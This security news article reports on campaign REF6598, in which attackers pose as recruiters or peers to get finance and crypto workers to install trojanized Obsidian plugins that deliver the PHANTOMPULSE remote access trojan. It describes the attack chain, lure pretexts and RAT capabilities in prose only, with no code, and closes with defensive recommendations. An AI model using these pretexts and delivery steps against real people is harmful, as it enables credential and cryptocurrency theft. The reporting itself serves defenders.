# Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT in Targeted Attacks Against Finance and Crypto Sectors


Elastic Security Labs has uncovered a sophisticated social engineering campaign, tracked as REF6598, that weaponizes Obsidian—a popular cross-platform note-taking application—to distribute a previously undocumented remote access trojan dubbed PHANTOMPULSE. The attacks specifically target professionals in financial services and cryptocurrency industries, leveraging carefully crafted malicious plugins to establish persistent system access.


The discovery highlights an emerging threat vector: threat actors are exploiting legitimate productivity tools and their plugin ecosystems to bypass traditional security controls, using social engineering to convince users to install trojanized extensions that appear authentic.


## The Campaign and Attack Flow


REF6598 represents a methodical, well-researched operation that demonstrates deep knowledge of its target audience. Rather than relying on mass-distribution techniques, the attackers employ a highly targeted approach, manually identifying and contacting specific individuals working in fintech, trading, and blockchain development roles.


The social engineering premise centers on fake collaboration scenarios. Researchers observed attackers posing as:

  • Potential business partners in the crypto space
  • Recruiters for prestigious financial firms
  • Developers interested in code contributions
  • Industry peers sharing "research notes" or "trading analysis"

    • Initial contact occurs via professional networks like LinkedIn, email, or industry Slack communities. Targets are invited to download a "shared Obsidian vault" or install a "custom plugin" claimed to facilitate collaboration, provide market analysis, or integrate with trading platforms.


    ## The PHANTOMPULSE Remote Access Trojan


    PHANTOMPULSE is a fully-featured Windows remote access trojan with capabilities typical of premium commercial RATs but previously unknown to security research:


    | Capability | Purpose |

    |------------|---------|

    | Command execution | Run arbitrary commands with user privileges |

    | File exfiltration | Steal documents, spreadsheets, configuration files |

    | Credential harvesting | Extract stored passwords, API keys, cryptocurrency wallets |

    | Browser manipulation | Inject malicious content, steal session tokens |

    | Screen recording | Monitor user activity and capture sensitive transactions |

    | Keylogging | Record keystrokes, including trading orders and passwords |

    | Persistence mechanisms | Maintain access across reboots and system updates |

    | Anti-analysis evasion | Detect and disable antivirus, sandboxes, and debuggers |


    The trojan communicates with command-and-control (C2) infrastructure using obfuscated HTTPS, making detection by network monitoring tools significantly more difficult.


    ## Technical Delivery Mechanism


    The attack chain leverages Obsidian's plugin architecture—a feature designed to extend functionality through community-developed extensions.


    Attack sequence:


    1. Malicious Plugin Package – Attackers create a plugin disguised as a legitimate utility (e.g., "Crypto Portfolio Tracker," "Trading Journal Helper," "Secure Vault Sync")


    2. Installation via Manifest – Instead of being distributed through Obsidian's official marketplace, the plugin is delivered through a .obsidian/plugins/ directory in a shared vault or via manual installation instructions


    3. Obfuscated Payload – The plugin's JavaScript contains obfuscated code that downloads and executes PHANTOMPULSE during the Obsidian initialization process


    4. Privilege Escalation – Once running, PHANTOMPULSE attempts to escalate privileges and establish persistence


    5. Callback – The trojan establishes contact with C2 servers and awaits further instructions


    The delivery method is particularly effective because:

  • Obsidian is trusted by professionals in finance and crypto—its strong privacy credentials and offline-first design make it a target of choice
  • Plugin installations appear legitimate to Windows Defender and many antivirus solutions, especially if signed with spoofed certificates
  • No marketplace review – Plugins distributed outside the official store bypass any security screening

    • ## Targeting and Reconnaissance


    Elastic's analysis reveals the attackers conducted extensive reconnaissance before engagement. Victims were selected based on:

  • Public GitHub profiles showing crypto or fintech development
  • LinkedIn job titles and employment history
  • Published research papers or technical blog posts
  • Social media activity mentioning cryptocurrency holdings or trading

    • This targeted approach suggests the threat actor is a motivated, well-resourced group with specific financial objectives—likely seeking to either directly steal cryptocurrency, obtain sensitive trading information, or establish supply-chain access to larger organizations.


    ## Implications for Financial and Crypto Organizations


    Immediate risks:


  • Direct financial loss – Attackers can execute unauthorized transactions, drain cryptocurrency wallets, or steal API keys linked to trading accounts
  • Operational disruption – Infected systems could be used to launch further attacks internally or manipulate trading algorithms
  • Intellectual property theft – Source code for trading strategies, blockchain protocols, or financial software could be exfiltrated
  • Regulatory exposure – Compromised firms may face SEC or CFTC enforcement if market manipulation occurs through their systems

    • Secondary concerns:


  • Affected individuals could be pivots into larger organizations, especially if they work for multiple firms or maintain contractor relationships
  • Stolen cryptocurrency exchange credentials could enable unauthorized account access for months before detection
  • Compromised private keys stored in configuration files could lead to permanent asset loss

    • ## Industry Response and Detection


    Elastic Security Labs published IOCs (indicators of compromise) including:

  • PHANTOMPULSE file hashes
  • C2 domain names and IP addresses
  • Registry persistence keys
  • Obfuscated JavaScript patterns found in malicious plugins

    • Security vendors have begun updating detections. However, behavioral detection remains challenging because PHANTOMPULSE uses legitimate Windows APIs and encrypted C2 communication.


    ## Recommendations for Organizations and Individuals


    Immediate actions:


    1. Audit Obsidian installations – Review ~/.obsidian/plugins/ directories (on macOS/Linux) or %AppData%\Obsidian\.obsidian\plugins\ (Windows) for unrecognized or suspicious plugins

    2. Verify plugin sources – Only install plugins from Obsidian's official community marketplace; be wary of "shared vault" setups from unfamiliar contacts

    3. Check for PHANTOMPULSE artifacts – Scan systems with updated antivirus signatures and behavioral detection tools

    4. Review API and exchange accounts – Change passwords, enable 2FA, and audit activity logs on cryptocurrency exchanges and trading platforms


    Long-term hardening:


  • Implement application allowlisting – Restrict which applications can execute on developer and trading workstations
  • Network segmentation – Isolate trading and financial systems from general-purpose development machines
  • Privileged access management (PAM) – Control access to sensitive accounts, API keys, and cryptocurrency wallets using centralized PAM solutions
  • Supply chain security – When adopting community tools, verify provenance and monitor for plugin updates from unexpected sources
  • User security training – Educate technical staff on social engineering tactics and the risks of downloading tools from untrusted sources, especially when pressure or urgency is applied
  • Endpoint detection and response (EDR) – Deploy EDR solutions capable of detecting PHANTOMPULSE's command execution and persistence behaviors
  • Email and communication security – Screen incoming messages for impersonation and credential harvesting attempts

    • ## Conclusion


    The REF6598 campaign demonstrates that legitimate tools remain attractive attack vectors for sophisticated threat actors. By combining social engineering, a trusted application, and a previously unknown malware family, attackers have created a multi-stage supply chain compromise that bypasses many traditional defenses.


    Organizations in financial services and cryptocurrency must assume they are being actively targeted by skilled adversaries. Defense requires not only technical controls but also heightened awareness of social engineering tactics and rigorous verification of tool sources—even for applications perceived as secure or privacy-friendly.


    As Obsidian continues to grow in popularity among technical professionals, security teams should monitor the ecosystem closely and educate users that trust in the application does not extend to unvetted plugins, regardless of how legitimate they appear.


    ---


    *HackWire will continue to monitor this campaign. Further updates will be published as more infrastructure is identified and takedown efforts progress.*